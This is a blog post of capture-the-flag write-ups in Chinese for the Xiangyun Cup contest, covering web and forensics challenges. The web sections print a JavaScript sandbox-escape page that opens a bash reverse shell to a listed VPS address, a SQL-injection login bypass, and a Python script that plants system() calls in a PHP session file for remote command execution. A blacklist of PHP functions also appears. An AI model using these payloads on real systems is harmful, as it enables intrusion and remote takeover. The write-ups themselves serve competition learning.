R1gelX`Blog

22 object(s)
 

祥云杯 WriteUp

祥云杯部分题目WP

完整WP

查看https://demo.hedgedoc.org/wzMurH94TkqKbuy-SN7P0w

Web

ezyii

https://xz.aliyun.com/t/9948#toc-6
找到现成的链子,直接打

Crawler_z

下载附件审计,在user.js中引入了 crawler ,其中可以看到有一个goto,可以控制去访问我们指定的URL,而在 路由下 /bucket 可以调用goto ,并且crawler引入了zombie,如下


goto(url) {
        return new Promise((resolve, reject) => {
            try {
                this.crawler.visit(url, () => {
                    const resource = this.crawler.resources.length
                        ? this.crawler.resources.filter(resource => resource.response).shift() : null;
                    this.statusCode = resource.response.status
                    this.headers = this.getHeaders();
                    this.cookies = this.getCookies();
                    this.htmlContent = this.getHtmlContent();
                    resolve();
                });
            } catch (err) {
                reject(err.message);
            }
        })
    }

getHtmlContent() {
        let html = '';
        if (this.crawler.document && this.crawler.document.documentElement) {
            try {
                html = this.crawler.html();
            } catch (error) {
                console.log(error);
            }
        }
        return html;
    }

看到 this.crawler.html() 这儿可以获取动态页面,所以可以配合访问任意页面可以到任意js代码执行

先注册一个账号,然后将bucket改写为

http://101.132.238.43#https://511b6019b159486d5fad688926885160.oss-cn-beijing.ichunqiu.com/

然后访问一下 /user/verify?token=asdasd

然后在vps上放

<!DOCTYPE HTML>
//payload
//index.html
<html>

<body>
<script>this['constructor']['constructor']("require=this['constructor']['constructor']('return process')().mainModule.require;var sync=require('child_process').spawnSync; var sh = sync('bash', ['-c', 'bash -i >& /dev/tcp/101.132.238.43/5992 0>&1']); console.log(sh.output.toString());")()</script>
</body>
</html>

监听5992端口,然后访问一下 /user/bucket 触发goto,去访问我们的vps。拿到shell执行
/readflag

安全检测

登录框 输入

admin  1’or'1'='1

绕过,出现一个网站检测,明显的SSRF,随手测一个,可以输入127.0.0.1

点击预览,从页面看到请求的页面。

测试 url/admin 返回403Forbidden 说明这个存在,SSRF有目录浏览,发现 /admin/include123.php ,于是SSRF配合本地文件包含,输入

http://127.0.0.1/admin/include123.php

点击预览,拿到源码

http://127.0.0.1/admin/include123.php预览
Warning: include(): Filename cannot be empty in /var/www/html/admin/include123.php on line 20

Warning: include(): Failed opening '' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/html/admin/include123.php on line 20
<?php
$u=$_GET['u'];

$pattern = "\/\*|\*|\.\.\/|\.\/|load_file|outfile|dumpfile|sub|hex|where";
$pattern .= "|file_put_content|file_get_content|fwrite|curl|system|eval|assert";
$pattern .="|passthru|exec|system|chroot|scandir|chgrp|chown|shell_exec|proc_open|proc_get_status|popen|ini_alter|ini_restore";
$pattern .="|`|openlog|syslog|readlink|symlink|popepassthru|stream_socket_server|assert|pcntl_exec|http|.php|.ph|.log|\@|:\/\/|flag|access|error|stdout|stderr";
$pattern .="|file|dict|gopher";
//累了累了,饮茶先

$vpattern = explode("|",$pattern);

foreach($vpattern as $value){    
    if (preg_match( "/$value/i", $u )){
        echo "检测到恶意字符";
        exit(0);
    }
}

include($u);

show_source(__FILE__);
?>

测试提交的url及其参数会保存session里 ,于是利用session文件包含,check2.php会file_get_contents去访问提交的url1,所以参数要合理。且测试,preview等可未授权,不需要登录

import requests

url = input('#:>')

header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"}
phpssid = {'PHPSESSID':'yyds'}
def send(payload):
    payload = payload.replace(' ','${IFS}')
    res = requests.session()
    data = {'url1':'http://127.0.0.1/admin/include123.php?u=/tmp/sess_yyds&payload=<?scandir(\'/\');system(\''+payload+'\');?>'}
    res.post(url+'check2.php',headers=header,data=data,cookies=phpssid)
    res.get(url,cookies=phpssid,headers=header)
    text = res.get(url+'preview.php',headers=header,cookies=phpssid)
    print(text.content)

while True:
    send(input(':>'))

交互式 直接 ls / 查看到 /getflag.sh 输入 /getf???.sh 绕过检测

misc

层层取证

首先解压缩文件,看到有一个硬盘镜像和一个内存镜像

先用volality查看内存镜像,貌似没什么重要线索

打开Arsneal Image Mounter,挂载硬盘,出现 G H I三个盘,G盘boot分区不用管,I盘有BitLocker,肯定有用

image-20210821160707975

看到出现一个Win7系统盘,在用户桌面发现flag.txt,访问得提示

你连电脑都不能仿真打开,还想要flag ?

于是将硬盘镜像保存为vmhd格式,在Vmware中新建虚拟机,选择SCSI然后选择之前保存的vmhd,配置如图

image-20210821163129540
开机,进入系统,出现XiaoMing用户,发现有密码。回到volality hashdump一下,得到MD5

volatility -f memdump.mem --profile=Win7SP1x64 hashdump
Volatility Foundation Volatility Framework 2.6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
XinSai:1000:aad3b435b51404eeaad3b435b51404ee:27caa41e7118fd4429d9b9cbd87aaa40:::
XiaoMing:1001:aad3b435b51404eeaad3b435b51404ee:92efa7f9f2740956d51157f46521f941:::

在CMD5花钱解密 得到 xiaoming_handsome

进入桌面,桌面有便签提示,移动发现另一个便签,还有一个wireshark,盲猜会有流量分析

image-20210821161144129
image-20210821161303910
由提示可知,我们已经完成了第三个电脑加密,接下来是磁盘加密,根据提示

但我不会乱设密码

可以知道密码肯定包含xiaoming 于是尝试几次,当密码为XiaoMing时,成功进入加密磁盘,加密磁盘里果然有一个pcapng文件
用wireshark打开,导出http对象没有可用信息。然后发现一个与内网主机的udp流量,点击追踪UDP流

image-20210821161604288

rar文件头和flag.docx 刚好符合提示。

然后保存为原始数据。打开有提示

image-20210821161647471

解密rar之后解密docx文档拿到flag

flag{9ca871b668f2-b668-097c-cbm8-9op404c891e2}

鸣雏恋

打开docx文档,什么也没有也没有隐藏字符。改后缀为zip打开

在_rels里看到

image-20210821162121562

解压压缩包需要key,打开key,记事本看不到隐写的字符,但看到列数明显不匹配,应该是零宽隐写。

image-20210821162323721

拿到key

解密love,得到如下

image-20210821162349195

只有两种图片,写脚本转化为01:

#to01.py
from PIL import Image

def decode(s):
    res = ''
    for i in range(0,len(s),8):
        res += chr(int(s[i:i+8],2))
    return res

def writefile(filename,s):
    text = decode(s)
    with open(filename,'w') as f:
        f.write(text)


result = ''
for i in range(129487):
    img = Image.open('./out./'+str(i)+'.png')
    size = img.size
    x = img.width
    y = img.height
    img.close()
    if x == 23 and y == 26:
        result += '0'
        continue
    result += '1'

writefile('./output.txt',result)

打开文件得到如下的base64



将base64转化为图片,图片中即有flag

下载

考古

拿到镜像,用volatility分析

volatility -f memory --profile cmdscan

先cmdscan拿到命令行数据,发现运行了恶意exe(OneclickCleanup.exe) 利用filescan找到文件,再利用dumpfiles导出,丢入ida里分析,直接看main函数,很简单

int __cdecl main(int argc, const char **argv, const char **envp)
{
  FILE *v3; // ST10_4
  signed int k; // [esp+14h] [ebp-10h]
  signed int j; // [esp+18h] [ebp-Ch]
  signed int i; // [esp+1Ch] [ebp-8h]

  __main();
  for ( i = 0; i <= 44; ++i )
    _data_start__[i] ^= key[i % 10];
  for ( j = 0; j < (signed int)size; ++j )
    data[j] ^= key[j % 10];
  for ( k = 0; k <= 9; ++k )
    puts("Hacked by 1cePack!!!!!!!");
  v3 = fopen(_data_start__, "wb+");
  fwrite(data, size, 1u, v3);
  return 0;
}

发现是一个异或写文件,提取数据,异或保存下来

hexstr = '''37 52 35 37 30 02 2A 06 00 17 00 1B 49 12 31 05 7F 38 00 0D 00 01 07 14 2C 3D 1E 07 09 59 21 1B 0C 01 2C 3D 0B 0E 08 09 18 09 1D 16 2C'''.split(' ')
key = 'this_a_key'
filename = ''
datastr = '''A4 A7 78 93 FE D0 45 8A  65 79 74 68 69 73 5F 61
5F 6B 65 79 74 68 69 73  61 61 5C 6B 9B 86 7D 68
.......DATA数据此处省略很多很多'''.replace('  ',' ').replace("\n",' ').split(' ')
def xor(s):
    data = ''
    j = 0
    for i in s:
        #print(i)
        data += chr(ord(key[j:j+1])^int(i,16))
        j+=1
        if j%10 == 0:
            j=0
    print(data)
    return data
xor(hexstr)
data = xor(datastr)
with open('file.docx','wb') as f:

    f.write(bytes(data,encoding='utf-8'))

打开看到字符串:My friend, I said, there is really no flag here, why dont you believe me? 还要一些其他的可见字符
除此之外没有其他线索了,比赛的时候就卡在这儿
结合异或逻辑,将程序异或得到的docx文件与每一个可见字符异或,直到结果出现flag{,这儿确实有点谜语人了

ChieftainsSecret

题目拿到一个图片是一个转轮拨号机

binwalk拿到一个csv和一个图片,是一个电路图(应该是叫电路图)

右边是个处理器,不用管,左边是个角度传感器。csv则是对应的数据输出。思路很清晰,通过输出数据还原角度变化,队里的师傅在网上找到算法,将数据还原并绘出变化图,取出每次转动的角度。

然后结合角度器

分析得出66903851346,但是不对。比赛也卡在这儿了,当时想到了可能度数有差别,于是向前位移了试试,发现还是不对。
赛后才注意到,第4 5有点问题,每个按键本身有一定宽度,当拨号1时,不能完全到达上图中的0处,而是拨号键1的侧边触碰到底部的挡板。
于是向后位移,发现除了4 5大部分都是对的
正确答案是
77085962457